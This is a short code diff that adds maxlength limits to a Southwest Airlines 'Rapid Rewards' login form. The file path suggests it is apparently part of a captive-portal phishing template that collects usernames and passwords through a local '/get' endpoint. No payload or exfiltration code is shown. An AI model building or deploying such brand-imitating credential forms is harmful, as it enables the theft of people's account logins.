--- a/portals/airlines/southwest_airline.html
+++ b/portals/airlines/southwest_airline.html
@@ -93,11 +93,11 @@ button {
 <form action="/get" method="GET">
 
 <div class="form-group">
-<input type="text" name="email" class="form-control" placeholder="Rapid Rewards # or Username" required>
+<input type="text" name="email" class="form-control" placeholder="Rapid Rewards # or Username" maxlength="100" required>
 </div>
 
 <div class="form-group">  
-<input type="password" name="password" class="form-control" placeholder="Password" required>
+<input type="password" name="password" class="form-control" placeholder="Password" maxlength="100" required>
 </div>
 
 <button type="submit">Sign In</button>
